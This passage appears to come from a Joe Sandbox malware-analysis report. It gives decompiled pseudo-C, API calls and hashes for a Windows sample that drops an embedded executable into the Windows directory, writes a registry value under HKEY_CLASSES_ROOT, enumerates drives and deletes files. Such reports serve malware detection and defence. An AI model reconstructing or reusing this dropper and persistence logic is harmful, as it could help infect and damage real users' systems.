				_push(_t86);
				_push(0x407ac4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t86;
				E00407080(0x4091e0, 0xb, 0xb);
				E004031F4( &_v12, 0xb, 0x4091e0);
				_push(_v12);
				E00404F90( &_v16, __ebx, 0xb);
				_pop(_t59);
				E00403258( &_v8, _t59, _v16);
				if(E00404B9C() != 0) {
					DeleteFileA(E0040340C(_v8));
				}
				_t31 = E00404BF8(E0040340C(_v8), _t54, 0xa200, 0x40a698, _t82, _t83); // executed
				if(_t31 != 0) {
					E00407080(0x4091ec, 0x1a, 0x1a);
					E004031F4( &_v20, 0x1a, 0x4091ec);
					_t55 = E0040575C(0x80000000, 0x1a, _v20);
					E00407080(0x409208, 8, 8);
					E004031F4( &_v28, 8, 0x409208);
					E00403258( &_v24, _v28, _v8);
					E0040578C(_t40, _v24, 0);
					E004057CC(_t55);
				}
				_pop(_t73);
				 *[fs:eax] = _t73;
				_push(E00407ACB);
				return E004030B8( &_v28, 6);
			}















                                                                          0x004079a0
                                                                          0x004079a0
                                                                          0x004079a0
                                                                          0x004079a5
                                                                          0x004079a6
                                                                          0x004079a7
                                                                          0x004079a8
                                                                          0x004079a9
                                                                          0x004079aa
                                                                          0x004079ab
                                                                          0x004079ae
                                                                          0x004079af
                                                                          0x004079b4
                                                                          0x004079b7
                                                                          0x004079c9
                                                                          0x004079db
                                                                          0x004079e3
                                                                          0x004079e7
                                                                          0x004079f2
                                                                          0x004079f3
                                                                          0x00407a02
                                                                          0x00407a0d
                                                                          0x00407a0d
                                                                          0x00407a24
                                                                          0x00407a2b
                                                                          0x00407a3c
                                                                          0x00407a4e
                                                                          0x00407a60
                                                                          0x00407a71
                                                                          0x00407a83
                                                                          0x00407a91
                                                                          0x00407a9d
                                                                          0x00407aa4
                                                                          0x00407aa4
                                                                          0x00407aab
                                                                          0x00407aae
                                                                          0x00407ab1
                                                                          0x00407ac3

                                                                          APIs
                                                                            • Part of subcall function 00404F90: GetWindowsDirectoryA.KERNEL32(?,00000105,00000000,00404FFA,?,?,?,00407EB6,00000000,00408020,?,?,00000000,00000000,?,0040819C), ref: 00404FBE
                                                                            • Part of subcall function 00404B9C: GetFileAttributesA.KERNEL32(00000000,00407EDD,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000,00408220), ref: 00404BA2
                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00407AC4,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00408200,00000000,00408220), ref: 00407A0D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$AttributesDeleteDirectoryWindows
                                                                          • String ID: MZP
                                                                          • API String ID: 3550186980-2889622443
                                                                          • Opcode ID: 3ee79c2a49ddb8816c4432ff5edea5131a792a15af00d109a84fb823656587da
                                                                          • Instruction ID: 69b580403c23d9cc841dfa7c227de2d2e2536c961132663fd28ad6461d03daee
                                                                          • Opcode Fuzzy Hash: 3ee79c2a49ddb8816c4432ff5edea5131a792a15af00d109a84fb823656587da
                                                                          • Instruction Fuzzy Hash: 91212F70B04109ABDB04FAA5C85279F7B69EB85304F50847EA501BB3C2DF3CEE05976A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404BC4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 480 404bc4-404bd7 ReadFile 481 404bd9 480->481 482 404bdb-404bdc 480->482 481->482
                                                                          C-Code - Quality: 100%
                                                                          			E00404BC4(void* __eax, long __ecx, void* __edx) {
				int _t2;
				void* _t3;
				DWORD* _t8;

				_t2 = ReadFile(__eax, __edx, __ecx, _t8, 0); // executed
				_t3 = 0;
				if(_t2 == 0) {
					return 0;
				}
				return _t3;
			}






                                                                          0x00404bcf
                                                                          0x00404bd6
                                                                          0x00404bd7
                                                                          0x00000000
                                                                          0x00404bd9
                                                                          0x00404bdc

                                                                          APIs
                                                                          • ReadFile.KERNEL32(00000000,MZP,?,?,00000000,00000000,?,00404CC7,00000000,00404CE6), ref: 00404BCF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID: MZP
                                                                          • API String ID: 2738559852-2889622443
                                                                          • Opcode ID: 07c637d247b66d3b0a9c7b3941f0c52b1614d40a6673a640bb3ecb2c78beae31
                                                                          • Instruction ID: 3ae4d4c2ce5489376b9a0e409b07906e0c93d400668ceedc4e43a286d92feaa2
                                                                          • Opcode Fuzzy Hash: 07c637d247b66d3b0a9c7b3941f0c52b1614d40a6673a640bb3ecb2c78beae31
                                                                          • Instruction Fuzzy Hash: DEC04CA12582083AF51061A29C16F23355CC781799F12456AB704E51D1F096F81000A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404BE0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 483 404be0-404bf2 WriteFile 484 404bf4 483->484 485 404bf6-404bf7 483->485 484->485
                                                                          C-Code - Quality: 100%
                                                                          			E00404BE0(void* __eax, long __ecx, void* __edx) {
				int _t2;
				void* _t3;
				void* _t7;
				DWORD* _t9;

				_t2 = WriteFile(__eax, __edx, __ecx, _t9, 0); // executed
				_t3 = _t7;
				if(_t2 == 0) {
					return 0;
				}
				return _t3;
			}







                                                                          0x00404bea
                                                                          0x00404bf1
                                                                          0x00404bf2
                                                                          0x00000000
                                                                          0x00404bf4
                                                                          0x00404bf7

                                                                          APIs
                                                                          • WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID: MZP
                                                                          • API String ID: 3934441357-2889622443
                                                                          • Opcode ID: 83a29245ac6b35b996f4ce35e430c7ef2da10dd3d2364903d861bf1a917f60bf
                                                                          • Instruction ID: cd8d274a544879f86d75f83ceab2a9824fbef203ff2d66308718860d554d7d3d
                                                                          • Opcode Fuzzy Hash: 83a29245ac6b35b996f4ce35e430c7ef2da10dd3d2364903d861bf1a917f60bf
                                                                          • Instruction Fuzzy Hash: 4EC04CA11582083AF51051A7AC06F233A5CC781698F114436BB08E1581F456F8011079
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401E74, Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 486 401e74-401e86 487 401e91-401e97 486->487 488 401e88 call 401788 486->488 490 401ea3-401eb8 487->490 491 401e99-401e9e 487->491 492 401e8d-401e8f 488->492 494 401ec4-401ecd 490->494 495 401eba-401ebf RtlEnterCriticalSection 490->495 493 401ff7-402000 491->493 492->487 492->491 496 401ed4-401eda 494->496 497 401ecf 494->497 495->494 498 401ee0-401ee4 496->498 499 401f73-401f79 496->499 497->496 500 401ee6 498->500 501 401ee9-401ef8 498->501 502 401fc5-401fc7 call 401d80 499->502 503 401f7b-401f88 499->503 500->501 501->499 506 401efa-401f08 501->506 511 401fcc-401fe3 502->511 504 401f97-401fc3 call 402bec 503->504 505 401f8a-401f92 503->505 504->493 505->504 509 401f24-401f28 506->509 510 401f0a-401f0e 506->510 516 401f2a 509->516 517 401f2d-401f48 509->517 513 401f10 510->513 514 401f13-401f22 510->514 519 401fe5-401fea RtlLeaveCriticalSection 511->519 520 401fef 511->520 513->514 518 401f4a-401f6e call 402bec 514->518 516->517 517->518 518->493 519->520
                                                                          APIs
                                                                            • Part of subcall function 00401788: RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,0040183E,?,?,00402022,020DD588,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 0040179E
                                                                            • Part of subcall function 00401788: RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,0040183E,?,?,00402022,020DD588,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017B1
                                                                            • Part of subcall function 00401788: LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,0040183E,?,?,00402022,020DD588,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017DB
                                                                            • Part of subcall function 00401788: RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,0040183E,?,?,00402022,020DD588,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 00401838
                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401FF0), ref: 00401EBF
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401FF7), ref: 00401FEA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                          • String ID:
                                                                          • API String ID: 2227675388-0
                                                                          • Opcode ID: 24205a5bcb3744ab7aeb7e662ffdb7704d8f0e00ee709498c29b313c1ff4e1e9
                                                                          • Instruction ID: c8d1828e50afdd1ef66478082c2fc5af823077db28515af4f228c2db3bc24797
                                                                          • Opcode Fuzzy Hash: 24205a5bcb3744ab7aeb7e662ffdb7704d8f0e00ee709498c29b313c1ff4e1e9
                                                                          • Instruction Fuzzy Hash: 8A419BB2A043029FD714CF69DE81A2AB7B0FB59318B18827FD441E72F1D739A8518A49
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040759C, Relevance: 3.1, APIs: 2, Instructions: 62synchronizationCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 61%
                                                                          			E0040759C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v8;
				char _v12;
				void* _t11;
				void* _t17;
				void* _t32;
				intOrPtr _t38;
				void* _t44;
				void* _t46;
				intOrPtr _t49;

				_t56 = __fp0;
				_t45 = __esi;
				_t48 = _t49;
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t49);
				_push(0x40765c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t49; // executed
				_t11 = E00406E94(__ebx, __ecx, __edi, __esi, __eflags, __fp0); // executed
				if(_t11 != 0) {
					_t40 = 0x14;
					E00407080(0x4091c8, 0x14, 0x14);
					_t17 = E00404018(0, 0, 0x4091c8); // executed
					_t44 = _t17;
					if(GetLastError() != 0xb7) {
						E00406D40( &_v8, __ebx, _t44, __esi); // executed
						_t32 = E0040320C(_v8);
						_t53 = _t32;
						if(_t32 > 0) {
							_t46 = 1;
							do {
								E004031B4();
								_t40 = 0x407674;
								E00403214( &_v12, 0x407674);
								E004074B4(_v12, _t32, _t44, _t46, _t53, _t48); // executed
								_pop(0x14);
								_t46 = _t46 + 1;
								_t32 = _t32 - 1;
								_t54 = _t32;
							} while (_t32 != 0);
						}
						E00406E0C(_t32, 0x14, _t40, _t44, _t45, _t54, _t56);
						ReleaseMutex(_t44);
					}
				}
				_pop(_t38);
				 *[fs:eax] = _t38;
				_push(E00407663);
				return E004030B8( &_v12, 2);
			}












                                                                          0x0040759c
                                                                          0x0040759c
                                                                          0x0040759d
                                                                          0x0040759f
                                                                          0x004075a1
                                                                          0x004075a3
                                                                          0x004075a4
                                                                          0x004075a5
                                                                          0x004075a8
                                                                          0x004075a9
                                                                          0x004075ae
                                                                          0x004075b1
                                                                          0x004075b4
                                                                          0x004075bb
                                                                          0x004075cb
                                                                          0x004075d0
                                                                          0x004075de
                                                                          0x004075e3
                                                                          0x004075ef
                                                                          0x004075f4
                                                                          0x00407601
                                                                          0x00407603
                                                                          0x00407605
                                                                          0x00407607
                                                                          0x0040760c
                                                                          0x00407617
                                                                          0x0040761f
                                                                          0x00407624
                                                                          0x0040762c
                                                                          0x00407631
                                                                          0x00407632
                                                                          0x00407633
                                                                          0x00407633
                                                                          0x00407633
                                                                          0x0040760c
                                                                          0x00407636
                                                                          0x0040763c
                                                                          0x0040763c
                                                                          0x004075ef
                                                                          0x00407643
                                                                          0x00407646
                                                                          0x00407649
                                                                          0x0040765b

                                                                          APIs
                                                                            • Part of subcall function 00404018: CreateMutexA.KERNEL32(00408220,00408206,00408205,?,004075E3,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000), ref: 0040402E
                                                                          • GetLastError.KERNEL32(00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000,?,00408205,00000000,00408220), ref: 004075E5
                                                                            • Part of subcall function 00406D40: GetLogicalDriveStringsA.KERNEL32 ref: 00406D70
                                                                          • ReleaseMutex.KERNEL32(00000000,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000,?,00408205,00000000,00408220), ref: 0040763C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Mutex$CreateDriveErrorLastLogicalReleaseStrings
                                                                          • String ID:
                                                                          • API String ID: 676290295-0
                                                                          • Opcode ID: 0b1858c04844e63bceb42a1c2aae0906aae676d4158ef1d644554abea356ae6a
                                                                          • Instruction ID: a50fa674edadcb4b051b0a96f5935ee5b8f91fbc0aee7086ed6abe5ddad9c237
                                                                          • Opcode Fuzzy Hash: 0b1858c04844e63bceb42a1c2aae0906aae676d4158ef1d644554abea356ae6a
                                                                          • Instruction Fuzzy Hash: A2110A306446086BD710BBA6CC42B5E7B6CCB81714F5004BBFA017B3C3CA3DAD04816E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004012A0, Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004012A0(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E00401154(0x40a5d4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                                                          0x004012a3
                                                                          0x004012ad
                                                                          0x004012bc
                                                                          0x004012af
                                                                          0x004012af
                                                                          0x004012af
                                                                          0x004012c2
                                                                          0x004012cf
                                                                          0x004012d4
                                                                          0x004012d6
                                                                          0x004012da
                                                                          0x004012e3
                                                                          0x004012ea
                                                                          0x004012f6
                                                                          0x004012fd
                                                                          0x00000000
                                                                          0x004012fd
                                                                          0x004012ea
                                                                          0x00401302

                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004015A9), ref: 004012CF
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004015A9), ref: 004012F6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Virtual$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 2087232378-0
                                                                          • Opcode ID: 677c0526faf000c49acf14ba7c711909bb3502ece2a084bb3d0e397bba4ce0ca
                                                                          • Instruction ID: 90e8f67b1060bd1251f945ff82b9078c1ba764c12e4cd0c6011b14969f372c3f
                                                                          • Opcode Fuzzy Hash: 677c0526faf000c49acf14ba7c711909bb3502ece2a084bb3d0e397bba4ce0ca
                                                                          • Instruction Fuzzy Hash: 97F02773B006205BEB206A6A4D81B4369C59F59B90F1400BAFB4CFF3D9DA798C0043A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405200, Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 45%
                                                                          			E00405200(void* __eax, void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t22;
				void* _t30;
				void* _t31;
				void* _t39;
				intOrPtr _t41;
				intOrPtr _t46;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t30 = __eax;
				_push(_t46);
				_push(0x405291);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46;
				E00404ED0(__eax,  &_v16);
				_push(_v16);
				E00404EEC( &_v20);
				_pop(_t39); // executed
				E00405080(_v20, _t30,  &_v8, _t39, __esi); // executed
				_t31 = 1;
				while(_v8 != 0) {
					E00404798( &_v8,  &_v12, E004052A8);
					if(_t31 == 0 || DeleteFileA(E0040340C(_v12)) == 0) {
						_t22 = 0;
					} else {
						_t22 = 1;
					}
					_t31 = _t22;
				}
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E00405298);
				return E004030B8( &_v20, 4);
			}













                                                                          0x00405205
                                                                          0x00405206
                                                                          0x00405207
                                                                          0x00405208
                                                                          0x0040520a
                                                                          0x0040520e
                                                                          0x0040520f
                                                                          0x00405214
                                                                          0x00405217
                                                                          0x0040521f
                                                                          0x00405227
                                                                          0x0040522d
                                                                          0x00405238
                                                                          0x00405239
                                                                          0x0040523e
                                                                          0x00405270
                                                                          0x0040524d
                                                                          0x00405254
                                                                          0x00405268
                                                                          0x0040526c
                                                                          0x0040526c
                                                                          0x0040526c
                                                                          0x0040526e
                                                                          0x0040526e
                                                                          0x00405278
                                                                          0x0040527b
                                                                          0x0040527e
                                                                          0x00405290

                                                                          APIs
                                                                            • Part of subcall function 00405080: FindFirstFileA.KERNEL32(00000000,?,00000000,004051DB,?,?,?,?,0040523E,00000000,00405291,?,?,00000000,00000000,00000000), ref: 0040513B
                                                                            • Part of subcall function 00405080: FindClose.KERNEL32(00000000,00000000,00000010), ref: 004051AB
                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00405291,?,?,00000000,00000000,00000000,00000000,?,00407736,?,?,?,00000000,0040798C), ref: 0040525F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileFind$CloseDeleteFirst
                                                                          • String ID:
                                                                          • API String ID: 3969940835-0
                                                                          • Opcode ID: 238fab5c7ccdf0ad421be398039805a42527f4fe23ed0a78c41523e31c8e5186
                                                                          • Instruction ID: 7b79426e1ef5d484ccb35ed710867a40efa654d54104ddfac4c0367765dd07f6
                                                                          • Opcode Fuzzy Hash: 238fab5c7ccdf0ad421be398039805a42527f4fe23ed0a78c41523e31c8e5186
                                                                          • Instruction Fuzzy Hash: BF01A174604608AFDB04EBA1CC529AF73ACEF45304F5048BEF901B3281E678AE059E68
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040578C, Relevance: 1.5, APIs: 1, Instructions: 31registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0040578C(void* __eax, void* __ecx, void* __edx) {
				void* _t4;
				char* _t7;
				long _t10;
				void* _t12;

				_t12 = __eax;
				if(__eax == 0) {
					L2:
					return 0;
				}
				_t4 = E0040320C(__ecx);
				_t7 = E0040340C(__ecx);
				_t10 = RegSetValueExA(_t12, E0040340C(__edx), 0, 1, _t7, _t4 + 1); // executed
				if(_t10 == 0) {
					return 1;
				}
				goto L2;
			}







                                                                          0x00405793
                                                                          0x00405797
                                                                          0x004057c0
                                                                          0x00000000
                                                                          0x004057c0
                                                                          0x0040579b
                                                                          0x004057a4
                                                                          0x004057b7
                                                                          0x004057be
                                                                          0x00000000
                                                                          0x004057c4
                                                                          0x00000000

                                                                          APIs
                                                                          • RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00000001,?,?,00000000,00407AA2,00000000,00407AC4,?,?,00000000,00000000), ref: 004057B7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID:
                                                                          • API String ID: 3702945584-0
                                                                          • Opcode ID: 8fc1d0df2935156870a761a9e005f3ed3dcf16a2c3928d3d316ee70feded526d
                                                                          • Instruction ID: 82ccab74ab13a132c34841d8e2f7e51fc97cb509c9d1c97b6ea97491bda523d5
                                                                          • Opcode Fuzzy Hash: 8fc1d0df2935156870a761a9e005f3ed3dcf16a2c3928d3d316ee70feded526d
                                                                          • Instruction Fuzzy Hash: 17E04F5131061166E511256A0CC1A7B0D9D8B44A56F04043BB904EF2C3D968CD0321A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406CA8, Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00406CA8(void* __eax, int __ecx, void* __edx) {
				char* _t6;
				void* _t7;
				void* _t8;
				void* _t11;
				int _t16;

				_t16 = __ecx;
				_t11 = __eax;
				E004064E4(__eax);
				_t6 = E0040340C(__edx);
				_t7 =  *0x40a650; // 0x400000
				_t8 = ExtractIconA(_t7, _t6, _t16); // executed
				if(_t8 > 1) {
					return E00406520(_t11, _t8);
				}
				return _t8;
			}








                                                                          0x00406cab
                                                                          0x00406caf
                                                                          0x00406cb3
                                                                          0x00406cbb
                                                                          0x00406cc1
                                                                          0x00406cc7
                                                                          0x00406ccf
                                                                          0x00000000
                                                                          0x00406cd4
                                                                          0x00406cdc

                                                                          APIs
                                                                            • Part of subcall function 004064E4: DestroyCursor.USER32(00000000), ref: 004064F3
                                                                          • ExtractIconA.SHELL32(00400000,00000000,00000000), ref: 00406CC7
                                                                            • Part of subcall function 00406520: GetIconInfo.USER32(?), ref: 00406540
                                                                            • Part of subcall function 00406520: GetObjectA.GDI32(?,00000018,?), ref: 00406551
                                                                            • Part of subcall function 00406520: DeleteObject.GDI32(?), ref: 00406566
                                                                            • Part of subcall function 00406520: DeleteObject.GDI32(?), ref: 00406574
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$DeleteIcon$CursorDestroyExtractInfo
                                                                          • String ID:
                                                                          • API String ID: 2619871307-0
                                                                          • Opcode ID: 12884ea93cf9522b21f7407772e5477059801f61b384028fea43c793ebaab2fd
                                                                          • Instruction ID: 3dd68c7f1dd4f5608f9b9662a0ba171f3b5b53225b24c93893625578eb0e5390
                                                                          • Opcode Fuzzy Hash: 12884ea93cf9522b21f7407772e5477059801f61b384028fea43c793ebaab2fd
                                                                          • Instruction Fuzzy Hash: 32D05E767002202BC321B6BF2CC181B8ADDCACA269316453FB109F7293C97DCC12126D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040575C, Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0040575C(void* __eax, void* __ecx, void* __edx) {
				long _t4;
				void* _t7;
				void** _t12;

				_t7 = __eax;
				_t4 = RegOpenKeyExA(_t7, E0040340C(__edx), 0, 0x2001f, _t12); // executed
				if(_t4 != 0) {
					 *_t12 = 0;
				}
				return  *_t12;
			}






                                                                          0x00405761
                                                                          0x00405774
                                                                          0x0040577b
                                                                          0x0040577f
                                                                          0x0040577f
                                                                          0x00405788

                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,0002001F,?,?,?,?,00407A60,00000000,00407AC4,?,?,00000000,00000000,00000000), ref: 00405774
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Open
                                                                          • String ID:
                                                                          • API String ID: 71445658-0
                                                                          • Opcode ID: 069e22fb027c4afddc5b5976f6d816458c7a75ea1a42f49c021bc25e4846d371
                                                                          • Instruction ID: 3a3203429d587fd7172cf24d4e67cc15a32e0ac6e1cd073cd859d0159acdf75a
                                                                          • Opcode Fuzzy Hash: 069e22fb027c4afddc5b5976f6d816458c7a75ea1a42f49c021bc25e4846d371
                                                                          • Instruction Fuzzy Hash: 7AD05EA13046107EE210B62A5C81FBB6ACCCB487A6F00053AF948E6283D225CD0052A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404F34, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00404F34(void* __eax, void* __edx) {
				char _v268;
				long _t6;
				void* _t13;
				void* _t14;

				_t13 = __edx;
				_t6 = GetShortPathNameA(E0040340C(__eax),  &_v268, 0x104); // executed
